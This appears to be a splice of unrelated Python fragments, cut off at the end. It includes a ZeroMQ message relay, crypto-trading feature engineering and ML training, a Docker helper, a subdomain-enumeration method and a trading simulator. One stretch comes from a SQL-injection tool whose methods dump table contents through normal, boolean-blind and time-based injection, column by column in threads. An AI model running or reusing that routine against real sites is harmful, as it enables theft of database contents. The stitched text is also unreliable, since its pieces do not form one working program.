        hostnames = list_to_str(results[ip_address]['Domains'])
        notes = results[ip_address]['Notes']
    pub_s = context.socket(zmq.PUB)
    pub_s.bind('tcp://*:{PUB_PORT}'.format(PUB_PORT=pub_p))

    sub_s = context.socket(zmq.SUB)
    sub_s.setsockopt(zmq.SUBSCRIBE, '')
    sub_s.bind('tcp://*:{SUB_PORT}'.format(SUB_PORT=sub_p))

    poller = zmq.Poller()
    poller.register(sub_s, zmq.POLLIN)

    while 1:
        socks = dict(poller.poll(360000))
        if socks:
            for sock, event in socks.iteritems():
                if sock is sub_s:
                    frame = sub_s.recv_multipart()
                    logger.info('MESSAGE:%s', frame)
                    pub_s.send_multipart(frame)


if __name__ == '__main__':
    sub_p = 9021
    pub_p = 9022
    opts, argvs = getopt.getopt(sys.argv[1:], "s:p:")
    for op, value in opts:
        if op == '-s':
            sub_p = int(value)
        if op == '-p':
            pub_p = int(value)
    logger.info('starting...')
    serv_forever(sub_p, pub_p)
def get_content(self, result, database_name, table_name, column_name, limits): # 开始注内容 content_len = 0 logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits)) # 先GET if self.sqlirequest == "GET": logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 注这一条的数据长度 logger.debug("Start %dth content length sqli..." % (limits + 1)) content_len = normal_injection( select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content logger.debug("Start %dth content sqli..." % (limits + 1)) content = normal_injection(select=column_name, source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的 length retVal = build_injection(select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False): retVal = build_injection( select="ascii(substring(" + column_name + "," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的length retVal = time_injection(select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False): retVal = time_injection( select="ascii(substring(" + column_name + "," + repr(j + 1) + ",1))", source=database_name + "." 
+ table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) # 然后是post elif self.sqlirequest == "POST": logger.debug("The sqlirequest is %s, start sqli contents..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 首先是tablename的长度 content_len = normal_injection( select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content content = normal_injection(select=column_name, source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的length retVal = build_injection(select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False): retVal = build_injection( select="ascii(substring(" + column_name + "," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的length retVal = time_injection(select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False): retVal = time_injection( select="ascii(substring(" + column_name + "," + repr(j + 1) + ",1))", source=database_name + "." 
+ table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
def run_content(self):
    if len(self.columns_name) == 0:
        SqliColumns.get_columns(self)

    # Unpack in a loop and start the injection
    for database_name in self.columns_name:
        for table_name in self.columns_name[database_name]:

            # Get the number of rows; if it differs from self.content_count, update self.content_count
            content_counts = self.get_content_count(database_name, table_name)
            if content_counts == 0:
                logger.warning('Database %s Table %s is empty...' % (database_name, table_name))
                continue
            elif content_counts != self.content_count:
                logger.debug('Database %s Table %s content amount change to %d'
                             % (database_name, table_name, content_counts))
                self.content_count = content_counts
            else:
                pass

            # Declare a table to store the data
            content = PrettyTable(list(self.columns_name[database_name][table_name]))
            content.padding_width = 1
            content.align = "r"

            # Each table is injected the configured number of times
            for limits in xrange(self.content_count):

                # Declare a queue to store the returned values
                result = Queue.Queue()

                # Declare the thread list, the result list and the list of values to insert into the table
                threads = []
                results = []
                contents = []

                # Start the multi-threaded injection
                logger.debug("Start multithreading Sqli...")
                for column_name in self.columns_name[database_name][table_name]:
                    # One thread injects one column
                    try:
                        t = threading.Thread(target=self.get_content,
                                             name='thread for %s' % column_name,
                                             args=(result, database_name, table_name, column_name, limits))
                        t.start()
                    except ConnectionError:
                        logger.error('Thread error...')
                        pass
                    threads.append(t)

                # Wait for all threads to finish
                for t in threads:
                    t.join()

                # Collect the returned data, one row of the content
                while not result.empty():
                    results.append(result.get())

                # Order the returned data by column
                for i in list(self.columns_name[database_name][table_name]):
                    for item in results:
                        if item[0] == i:
                            contents.append(item[1])
                        else:
                            continue

                # Insert the row
                content_str = ','.join(contents)
                logger.info("Sqli success content is %s" % content_str)
                content.add_row(contents)

            # Print the table
            logger.debug("Database %s Table %s sqli success..." % (database_name, table_name))
            print "[*] Database %s Table %s content:" % (database_name, table_name)
            print content
def main(): index = load_dataset('all_merged', return_index=True) for _sym, data in index.items(): features, target = get_symbol_features(index, _sym) features_p = features[data['features']['ohlcv']].pct_change().replace( [np.inf, -np.inf], np.nan) features_p.columns = [c + '_p1' for c in features_p.columns] features_1 = features_p.shift(1) features_1.columns = [c + '_lag1' for c in features_1.columns] features_2 = features_p.shift(2) features_2.columns = [c + '_lag2' for c in features_2.columns] features_mean = features_p.rolling(3).mean() features_mean.columns = [c + '_mean_3' for c in features_mean.columns] ta = features[data['features']['ta'] + data['features']['ta_7d'] + data['features']['ta_30d']] features = pd.concat([ features['close'], ta, features_p, features_1, features_2, features_mean ], axis=1)[30:] target = target[30:] # Split data in train and blind test set with 70:30 ratio, # most ML models don't take sequentiality into account, but our pipeline # uses a SimpleImputer with mean strategy, so it's best not to shuffle the data. X_train, X_test, y_train, y_test = train_test_split(features.values, target.values, shuffle=False, test_size=0.3) logger.info("Start Feature Selection") imp = SimpleImputer() values = imp.fit_transform(X_train) #sel = SelectKBest(score_func=f_classif, k=min(10, X_train.shape[1])) feature_count = int(0.3 * X_train.shape[1]) sel = RFECV(estimator=RandomForestClassifier(), cv=5, verbose=0, n_jobs=4, min_features_to_select=feature_count, scoring='neg_mean_squared_error') sel.fit(values, y_train) logger.info("End Feature Selection") bestfeatures = [ c for c, f in zip(features.columns, sel.get_support()) if f ] if not 'close' in bestfeatures: bestfeatures += ['close'] print("Using features:\n{}".format(bestfeatures, len(bestfeatures))) train_features = pd.DataFrame(X_train, columns=features.columns) test_features = pd.DataFrame(X_test, columns=features.columns) X_train = train_features[bestfeatures].values X_test = test_features[bestfeatures].values # Summarize distribution print("Training set: # Features {}, # Samples {}".format( X_train.shape[1], X_train.shape[0])) plot_class_distribution("Training set", _sym, y_train) print("Test set: # Features {}, # Samples {}".format( X_test.shape[1], X_test.shape[0])) plot_class_distribution("Test set", _sym, y_test) if not np.isfinite(X_train).all(): logger.warning("Training x is not finite!") if not np.isfinite(y_train).all(): logger.warning("Training y is not finite!") if not np.isfinite(X_test).all(): logger.warning("Test x is not finite!") if not np.isfinite(y_test).all(): logger.warning("Test y is not finite!") # Build pipeline to be used as estimator in grid search # so that each subset of the data is transformed independently # to avoid contamination between folds. 
pipeline = Pipeline([ ( 'i', IterativeImputer() ), # Replace nan's with the median value between previous and next observation ('s', MinMaxScaler(feature_range=(-1, 1))), ('c', MLPClassifier()), ]) # Perform hyperparameter tuning of the ensemble with 5-fold cross validation logger.info("Start Grid search") CV_rfc = GridSearchCV(estimator=pipeline, param_grid=PARAM_GRID, cv=5, n_jobs=4, scoring='neg_mean_squared_error', verbose=1) CV_rfc.fit(X_train, y_train) logger.info("End Grid search") # Take the fitted ensemble with tuned hyperparameters clf = CV_rfc.best_estimator_ # Test ensemble's performance on training and test sets logger.info("Classification report on train set") predictions1 = clf.predict(X_train) train_report = classification_report(y_train, predictions1, output_dict=True) print(classification_report(y_train, predictions1)) logger.info("Classification report on test set") predictions2 = clf.predict(X_test) test_report = classification_report(y_test, predictions2, output_dict=True) print(classification_report(y_test, predictions2)) stats = { 'score': accuracy_score(y_train, predictions1), 'mse': mean_squared_error(y_train, predictions1), 'test_score': accuracy_score(y_test, predictions2), 'test_mse': mean_squared_error(y_test, predictions2), 'train_report': train_report, 'test_report': test_report, } print(CV_rfc.best_params_) num_samples = min(y_train.shape[0], y_test.shape[0], 30) print("Gains calculated on {} samples only!".format(num_samples)) print( "Train Accuracy: {}\nTrain MSE: {}\nGains on train preds: 100 -> {}" .format( accuracy_score(y_train, predictions1), mean_squared_error(y_train, predictions1), test_gains(train_features['close'][0:num_samples], predictions1[0:num_samples], initial_balance=100, position_size=0.1))) print( "Test Accuracy: {}\nTest MSE: {}\nGains on test preds: 100 -> {}". format( accuracy_score(y_test, predictions2), mean_squared_error(y_test, predictions2), test_gains(test_features['close'][0:num_samples], predictions2[0:num_samples], initial_balance=100, position_size=0.1))) print("--- end ---")
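# PARAM_GRID is referenced above but defined elsewhere; a hypothetical example of its shape,
# with keys prefixed by the pipeline step name ('c' is the MLPClassifier step). The actual
# grid used in the project may differ.
PARAM_GRID_EXAMPLE = {
    'c__hidden_layer_sizes': [(10,), (32, 16)],
    'c__activation': ['relu', 'logistic'],
    'c__solver': ['adam', 'lbfgs'],
    'c__alpha': [1e-4, 1e-3],
}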
def build(source_index, dest_index, W=10): _dataset = load_dataset(source_index, return_index=True) for _sym, entry in _dataset.items(): _df = pd.read_csv(entry['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) _target = pd.read_csv(entry['target_csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) ohlcv = _df[entry['features']['ohlcv']] ohlcv_d = { d: _df[entry['features']['ohlcv_{}d'.format(d)]] for d in [3, 7, 30] } ta_d = { d: _df[entry['features']['ta_{}d'.format(d)]] for d in [3, 7, 30] } ta = _df[entry['features']['ta']] cm = _df[entry['features']['cm']] cm_picked = pd.DataFrame(index=ohlcv.index) if 'adractcnt' in cm.columns: cm_picked['adractcnt_pct'] = cm.adractcnt.pct_change() # cm_picked['adractcnt_mean3_pct'] = cm.adractcnt.rolling(3).mean().pct_change() # cm_picked['adractcnt_mean7_pct'] = cm.adractcnt.rolling(7).mean().pct_change() # if 'splycur' in cm.columns: ## Correlated with volume and close # cm_picked['vol_supply'] = ohlcv.volume / cm.splycur # Ratio between transacted volume and total supply (mined) if 'txtfrvaladjntv' in cm.columns and 'isstotntv' in cm.columns and 'feetotntv' in cm.columns: # I want to represent miners earnings (fees + issued coins) vs amount transacted in that interval cm_picked['earned_vs_transacted'] = ( cm.isstotntv + cm.feetotntv) / cm.txtfrvaladjntv if 'isstotntv' in cm.columns: # isstotntv is total number of coins mined in the time interval # splycur is total number of coins mined (all time) total_mined = cm.isstotntv.rolling( 365, min_periods=7).sum() # total mined in a year cm_picked['isstot365_isstot1_pct'] = (cm.isstotntv / total_mined).pct_change() if 'splycur' in cm.columns and 'isstotntv' in cm.columns: cm_picked['splycur_isstot1_pct'] = (cm.isstotntv / cm.splycur).pct_change() if 'hashrate' in cm.columns: #cm_picked['hashrate_mean3_pct'] = cm.hashrate.rolling(3).mean().pct_change() #cm_picked['hashrate_mean7_pct'] = cm.hashrate.rolling(7).mean().pct_change() cm_picked['hashrate_pct'] = cm.hashrate.pct_change() if 'roi30d' in cm.columns: cm_picked['roi30d'] = cm.roi30d if 'isstotntv' in cm.columns: cm_picked['isstotntv_pct'] = cm.isstotntv.pct_change() if 'feetotntv' in cm.columns: cm_picked['feetotntv_pct'] = cm.feetotntv.pct_change() if 'txtfrcount' in cm.columns: cm_picked['txtfrcount_pct'] = cm.txtfrcount.pct_change() #cm_picked['txtfrcount_volume'] = cm.txtfrcount.pct_change() if 'vtydayret30d' in cm.columns: cm_picked['vtydayret30d'] = cm.vtydayret30d if 'isscontpctann' in cm.columns: cm_picked['isscontpctann'] = cm.isscontpctann ta_picked = pd.DataFrame(index=ta.index) # REMA / RSMA are already used and well-estabilished in ATSA, # I'm taking the pct change since i want to encode the relative movement of the ema's not their positions # ta_picked['rema_5_20_pct'] = ta.rema_5_20.pct_change() ta_picked['rema_8_15_pct'] = ta.rema_8_15.pct_change() # ta_picked['rema_20_50_pct'] = ta.rema_20_50.pct_change() # ta_picked['rsma_5_20_pct'] = ta.rema_5_20.pct_change() ta_picked['rsma_8_15_pct'] = ta.rema_8_15.pct_change() # ta_picked['rsma_20_50_pct'] = ta.rema_20_50.pct_change() # Stoch is a momentum indicator comparing a particular closing price of a security to a range of its prices # over a certain period of time. # The sensitivity of the oscillator to market movements is reducible by adjusting that time period or # by taking a moving average of the result. # It is used to generate overbought and oversold trading signals, utilizing a 0-100 bounded range of values. 
# IDEA => decrease sensitivity by 3-mean and divide by 100 to get fp values ta_picked['stoch_14_mean3_div100'] = ta.stoch_14.rolling( 3).mean() / 100 #Moving Average Convergence Divergence (MACD) is a trend-following momentum indicator that shows # the relationship between two moving averages of a security’s price. # The MACD is calculated by subtracting the 26-period Exponential Moving Average (EMA) from the 12-period EMA. # A nine-day EMA of the MACD called the "signal line," is then plotted on top of the MACD line, # which can function as a trigger for buy and sell signals. # Traders may buy the security when the MACD crosses above its signal line and sell - or short - the security # when the MACD crosses below the signal line. # Moving Average Convergence Divergence (MACD) indicators can be interpreted in several ways, # but the more common methods are crossovers, divergences, and rapid rises/falls. signal_line = builder.exponential_moving_average(ta.macd_12_26, 9) ta_picked[ 'macd_12_26_signal'] = signal_line # Relationship with signal line ta_picked['macd_12_26_diff_signal'] = ( ta.macd_12_26 - signal_line).pct_change() # Relationship with signal line ta_picked['macd_12_26_pct'] = ta.macd_12_26.pct_change( ) # Information about slope # PPO is identical to the moving average convergence divergence (MACD) indicator, # except the PPO measures percentage difference between two EMAs, while the MACD measures absolute (dollar) difference. signal_line = builder.exponential_moving_average(ta.ppo_12_26, 9) ta_picked[ 'ppo_12_26_signal'] = signal_line # Relationship with signal line ta_picked['ppo_12_26_diff_signal'] = ( ta.ppo_12_26 - signal_line).pct_change() # Relationship with signal line ta_picked['ppo_12_26_pct'] = ta.ppo_12_26.pct_change( ) # Information about slope # ADI Accumulation/distribution is a cumulative indicator that uses volume and price to assess whether # a stock is being accumulated or distributed. # The accumulation/distribution measure seeks to identify divergences between the stock price and volume flow. # This provides insight into how strong a trend is. If the price is rising but the indicator is falling # this indicates that buying or accumulation volume may not be enough to support # the price rise and a price decline could be forthcoming. # ==> IDEA: if we can fit a line to the price y1 = m1X+q1 and a line to ADI y2=m2X+q2 then we can identify # divergences by simply looking at the sign of M. # Another insight would be given by the slope (ie pct_change) ta_picked['adi_pct'] = ta.adi.pct_change() ta_picked['adi_close_convergence'] = convergence_between_series( ta.adi, ohlcv.close, 3) # RSI goes from 0 to 100, values <= 20 mean BUY, while values >= 80 mean SELL. # Dividing it by 100 to get a floating point feature, makes no sense to pct_change it ta_picked['rsi_14_div100'] = ta.rsi_14 / 100 # The Money Flow Index (MFI) is a technical indicator that generates overbought or oversold # signals using both prices and volume data. The oscillator moves between 0 and 100. # An MFI reading above 80 is considered overbought and an MFI reading below 20 is considered oversold, # although levels of 90 and 10 are also used as thresholds. # A divergence between the indicator and price is noteworthy. For example, if the indicator is rising while # the price is falling or flat, the price could start rising. 
ta_picked['mfi_14_div100'] = ta.mfi_14 / 100 # The Chande momentum oscillator is a technical momentum indicator similar to other momentum indicators # such as Wilder’s Relative Strength Index (Wilder’s RSI) and the Stochastic Oscillator. # It measures momentum on both up and down days and does not smooth results, triggering more frequent # oversold and overbought penetrations. The indicator oscillates between +100 and -100. # Many technical traders add a 10-period moving average to this oscillator to act as a signal line. # The oscillator generates a bullish signal when it crosses above the moving average and a # bearish signal when it drops below the moving average. ta_picked['cmo_14_div100'] = ta.cmo_14 / 100 signal_line = builder.simple_moving_average(ta.cmo_14, 10) ta_picked['cmo_14_signal'] = signal_line ta_picked['cmo_14_diff_signal'] = (ta.cmo_14 - signal_line) / 100 # On-balance volume (OBV) is a technical trading momentum indicator that uses volume flow to predict changes in stock price. # Eventually, volume drives the price upward. At that point, larger investors begin to sell, and smaller investors begin buying. # Despite being plotted on a price chart and measured numerically, # the actual individual quantitative value of OBV is not relevant. # The indicator itself is cumulative, while the time interval remains fixed by a dedicated starting point, # meaning the real number value of OBV arbitrarily depends on the start date. # Instead, traders and analysts look to the nature of OBV movements over time; # the slope of the OBV line carries all of the weight of analysis. => We want percent change ta_picked['obv_pct'] = ta.obv.pct_change() ta_picked['obv_mean3_pct'] = ta.obv.rolling(3).mean().pct_change() # Strong rallies in price should see the force index rise. # During pullbacks and sideways movements, the force index will often fall because the volume # and/or the size of the price moves gets smaller. # => Encoding the percent variation could be a good idea ta_picked['fi_13_pct'] = ta.fi_13.pct_change() ta_picked['fi_50_pct'] = ta.fi_50.pct_change() # The Aroon Oscillator is a trend-following indicator that uses aspects of the # Aroon Indicator (Aroon Up and Aroon Down) to gauge the strength of a current trend # and the likelihood that it will continue. # It moves between -100 and 100. A high oscillator value is an indication of an uptrend # while a low oscillator value is an indication of a downtrend. ta_picked['ao_14'] = ta.ao_14 / 100 # The average true range (ATR) is a technical analysis indicator that measures market volatility # by decomposing the entire range of an asset price for that period. # ATRP is pct_change of volatility ta_picked['atrp_14'] = ta.atrp_14 # Percentage Volume Oscillator (PVO) is momentum volume oscillator used in technical analysis # to evaluate and measure volume surges and to compare trading volume to the average longer-term volume. # PVO does not analyze price and it is based solely on volume. # It compares fast and slow volume moving averages by showing how short-term volume differs from # the average volume over longer-term. # Since it does not care a trend's factor in its calculation (only volume data are used) # this technical indicator cannot be used alone to predict changes in a trend. 
ta_picked['pvo_12_26'] = ta.pvo_12_26 # IGNORED: tsi, wd, adx, #lagged_stats = pd.concat([ohlcv_stats] + [builder.make_lagged(ohlcv_stats, i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner') # Build the dataframe with base features # lagged_close = pd.concat([ohlcv.close.pct_change()] + [builder.make_lagged(ohlcv.close.pct_change(), i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner') # lagged_close.columns = ['close_pct'] + ['close_pct_lag-{}'.format(i) for i in range(1, W +1)] ohlc = ohlcv[['open', 'high', 'low', 'close', 'volume']].pct_change() ohlc.columns = ['{}_pct'.format(c) for c in ohlcv.columns] lagged_ohlc_pct = pd.concat( [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)], axis='columns', verify_integrity=True, sort=True, join='inner') _time = pd.DataFrame(index=ohlcv.index) _time['day_of_year'] = ohlcv.index.dayofyear _time['day_of_week'] = ohlcv.index.dayofweek ohlc = ohlcv[['open', 'high', 'low', 'close', 'volume']] x_space = np.linspace(0, ohlc.index.size, ohlc.index.size) _splines = pd.DataFrame(index=ohlcv.index) # Highly correlated between themselves, no use # _splines['open_spl'] = get_spline(ohlc.open, 0) # _splines['high_spl'] = get_spline(ohlc.high, 0) # _splines['low_spl'] = get_spline(ohlc.low, 0) # _splines['close_spl'] = get_spline(ohlc.close, 0) _splines['open_spl_d1'] = builder.get_spline(ohlc.open, 1) _splines['high_spl_d1'] = builder.get_spline(ohlc.high, 1) _splines['low_spl_d1'] = builder.get_spline(ohlc.low, 1) _splines['close_spl_d1'] = builder.get_spline(ohlc.close, 1) _splines['open_spl_d2'] = builder.get_spline(ohlc.open, 2) _splines['high_spl_d2'] = builder.get_spline(ohlc.high, 2) _splines['low_spl_d2'] = builder.get_spline(ohlc.low, 2) _splines['close_spl_d2'] = builder.get_spline(ohlc.close, 2) _patterns = builder.get_talib_patterns(ohlcv) _new_features = pd.DataFrame(index=ohlcv.index) _new_features['candlestick_patterns_mean'] = _patterns.mean(axis=1) _new_features['candlestick_patterns_sum'] = _patterns.sum(axis=1) # WE LIKE THESE TWO!!!! 
_new_features['close_volatility_7d'] = ohlcv.close.pct_change( ).rolling(7).std(ddof=0) _new_features['close_volatility_30d'] = ohlcv.close.pct_change( ).rolling(30).std(ddof=0) # # Candle body size variation, for example _new_features['close_open_pct'] = ( ohlcv.close - ohlcv.open ).pct_change() # Change in body of the candle (> 0 if candle is green) _new_features['high_close_dist_pct'] = ( ohlcv.high - ohlcv.close ).pct_change( ) # Change in wick size of the candle, shorter wick should be bullish _new_features['low_close_dist_pct'] = ( ohlcv.close - ohlcv.low ).pct_change( ) # Change in shadow size of the candle, this increasing would indicate support (maybe a bounce) _new_features['high_low_dist_pct'] = ( ohlcv.high - ohlcv.low ).pct_change( ) # Change in total candle size, smaller candles stands for low volatility for d in [3, 7, 30]: ohlcv_d[d].columns = ['close', 'high', 'low', 'open', 'volume'] _new_features['close_open_pct_d{}'.format(d)] = ( ohlcv_d[d].close - ohlcv_d[d].open).pct_change() _new_features['high_close_dist_pct_d{}'.format(d)] = ( ohlcv_d[d].high - ohlcv_d[d].close).pct_change() _new_features['low_close_dist_pct_d{}'.format(d)] = ( ohlcv_d[d].close - ohlcv_d[d].low).pct_change() _new_features['high_low_dist_pct_d{}'.format(d)] = ( ohlcv_d[d].high - ohlcv_d[d].low).pct_change() _ta_windowed_features = pd.concat([ v.rename(columns={c: '{}_ta{}d'.format(c, d) for c in v.columns}) for d, v in ta_d.items() ], axis=1) # Add lagged features to the dataframe ta.columns = ['{}_ta1d'.format(c) for c in ta.columns] feature_groups = [ _new_features, _splines, lagged_ohlc_pct, cm_picked, ta_picked, _ta_windowed_features, ta ] improved_df = pd.concat(feature_groups, axis='columns', verify_integrity=True, sort=True, join='inner') # Drop the first 30 rows improved_df = improved_df[30:] # Drop columns whose values are all nan or inf with pd.option_context('mode.use_inf_as_na', True): # Set option temporarily improved_df = improved_df.dropna(axis='columns', how='all') logger.info('Saving {}'.format(_sym)) save_symbol_dataset(dest_index, _sym, improved_df, target=_target) logger.info('Saved {}'.format(_sym))
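# convergence_between_series() is used above for the 'adi_close_convergence' feature but not
# shown; a minimal sketch under the assumption that it encodes agreement between the rolling
# slopes of the two series (+1 when they move together, -1 on divergence), as suggested by
# the ADI comment earlier in build(). The project's implementation may differ.
import numpy as np


def convergence_between_series_sketch(a, b, window):  # hypothetical
    slope_a = a.diff().rolling(window).mean()
    slope_b = b.diff().rolling(window).mean()
    return np.sign(slope_a * slope_b)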
def stop_container(self, name=None, id=None):
    for c in self.containers.values():
        if (not name and not id) or id == c['Id'] or (name and name in c['Names']):
            self.client.kill(c['Id'])
            self.client.remove_container(c['Id'], force=True)
            L.info("Stopped container %(Name)s (%(Status)s)" % c)
def run(self):
    domain_list = self.enumerate()
    for domain in domain_list:
        self.domain_name.append(domain)
    logger.info("{0} found {1} domains".format(self.engine_name, len(self.domain_name)))
    return self.domain_name, self.smiliar_domain_name, self.related_domain_name, self.email
def trading_day(day, symbols, signals, order_size=0.1, history=None): if not signals.shape[0] and not signals.shape[1]: return session = DBSession() result = pd.DataFrame() exchange = Exchange(session) for s in symbols: # If there's no signal for this coin, close the position if not s in signals.columns: continue signal = signals['{}'.format(s)].iloc[0] close = signals['{}_close'.format(s)].iloc[0] label = signals['{}_label'.format(s)].iloc[0] if np.isnan(signal) or np.isnan(close): # If signal is nan continue # if history is not None and not history.empty: # signal_history = history['{}'.format(s)] # close_history = history['{}_close'.format(s)] # label_history = history['{}_label'.format(s)] # precision = precision_score(label_history.values, signal_history.values, average='micro', zero_division=True) # Fit an spline on available historical data, needs at least 7 days of activity #history_length = close_history.shape[0] #if history_length > 0: # Check last label is correct #check_signal(label_history.values[-1], close, close_history.values[-1]) #-- # hist = close_history.copy() # hist.loc[day] = close # pct = hist.pct_change().values[-1] # if history_length >= 7: # x_space = np.linspace(0, history_length - 1, history_length) # close_spline = UnivariateSpline(x_space, close_history.values, s=0, k=4) # d1 = close_spline(history_length - 1, nu=1) # d2 = close_spline(history_length - 1, nu=2) # logger.info( # "[Trading day: {}] {} | Signal: {} True: {} Precision: {} | Close: {} Pct: {} d1: {} d2: {}".format( # day, s, signal, label, precision, close, pct, d1, d2 # )) # else: # logger.info("[Trading day: {}] {} | Signal: {} True: {} Precision: {} | Close: {} Pct: {}".format( # day, s, signal, label, precision, close, pct # )) #signal = label # Grab balance for current symbol asset = exchange.get_or_create_asset(s, margin_fiat=10000, coins=0) # # Order management # # Manage LONG orders open_longs = exchange.get_open_long(asset) for o in open_longs: # If close meets stop loss, close position if o.should_stop(close): logger.info( '[Day: {}] Closing long position {} on {} due to stop loss' .format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, o.stop_loss) continue # If signal is SELL or position has a 1% profit if signal == SignalType.SELL: logger.info( '[Day: {}] Closing long position {} on {} due to SELL signal' .format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, close) continue # Manage SHORT orders open_shorts = exchange.get_open_short(asset) for o in open_shorts: # If close meets stop loss, close position if o.should_stop(close): logger.info( '[Day: {}] Closing short position {} on {} due to stop loss' .format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, o.stop_loss) continue # If signal is BUY we're going to lose money, so we close position if signal == SignalType.BUY: logger.info( '[Day: {}] Closing short position {} on {} due to BUY signal' .format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, close) continue # If signal is HOLD and position is old if o.get_age_in_days(day) > 2 and signal == SignalType.HOLD: logger.info( '[Day: {}] Closing short position {} on {} due to age'. 
format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, close) continue # # Open new positions # # Determine position sizing position_coins = asset.position_size(close, order_size) # Open the order if signal == SignalType.BUY: logger.info( '[Day: {}] Opening long position on {} due to BUY signal [Close {}, Price {}, Coins {}]' .format(day, s, close, position_coins * close, position_coins)) o = exchange.open_order(day, OrderType.LONG, asset, position_coins, close, stop_loss=-0.01) # Stop loss is -1% if not o: logger.error("LONG FAILED") elif signal == SignalType.SELL: logger.info( '[Day: {}] Opening short position on {} due to BUY signal [Close {}, Price {}, Coins {}]' .format(day, s, close, position_coins * close, position_coins)) o = exchange.open_order(day, OrderType.SHORT, asset, position_coins, close, stop_loss=0.01) # Stop loss is +1% if not o: logger.error("SHORT FAILED") # Add result to dataframe result.loc[day, s] = asset.equity(close) session.commit() return result
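# NOTE (editor's sketch): Asset.position_size is not shown in this listing. A
# fixed-fraction sizing rule consistent with how it is called above (order_size
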